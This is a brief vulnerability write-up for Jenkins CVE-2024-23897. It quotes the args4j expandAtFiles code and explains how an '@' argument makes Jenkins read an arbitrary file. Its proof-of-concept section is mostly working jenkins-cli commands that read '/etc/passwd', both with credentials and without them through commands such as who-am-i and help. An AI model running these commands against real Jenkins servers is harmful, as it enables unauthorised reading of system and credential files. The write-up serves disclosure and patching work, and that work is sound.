Jenkins - CVE-2024-23897

Data Leak Vulnerability (fixed in version 2.442, and LTS 2.426.3)

Using Jenkins-CLI it's possible to leak data from the affected host.

When invoking a CLI command with arguments, we have noticed that Jenkins uses args4j’s parseArgument, which calls expandAtFiles:

private String[] expandAtFiles(String args[]) throws CmdLineException {
    List<String> result = new ArrayList<String>();
    for (String arg : args) {
        if (arg.startsWith("@")) {
            File file = new File(arg.substring(1));
            if (!file.exists())
                throw new CmdLineException(this,Messages.NO_SUCH_FILE,file.getPath());
            try {
                result.addAll(readAllLines(file));
            } catch (IOException ex) {
                throw new CmdLineException(this, "Failed to parse "+file,ex);
            }
        } else {
            result.add(arg);
        }
    }
    return result.toArray(new String[result.size()]);
}

The function checks if the argument starts with the @ character, and if so, it reads the file in the path after the @ and expands a new argument for each line.

This means that if an attacker can control an argument, they can expand it to an arbitrary number of ones from an arbitrary file on the Jenkins instance.

POC

Download the Jenkins CLI tool:

wget <https://xxx.yyy/jnlpJars/jenkins-cli.jar>

  1. Authenticated, retrieve complete file:

$ java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins -auth abc:abc connect-node "@/etc/passwd"

  1. Unauthenticated or missing Global/Read permissions, read ..

.. first line:

java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins who-am-i "@/etc/passwd"

.. second line:

java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins enable-job "@/etc/passwd"

.. third line:

java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins help "@/etc/passwd"

Credits: https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/

Last updated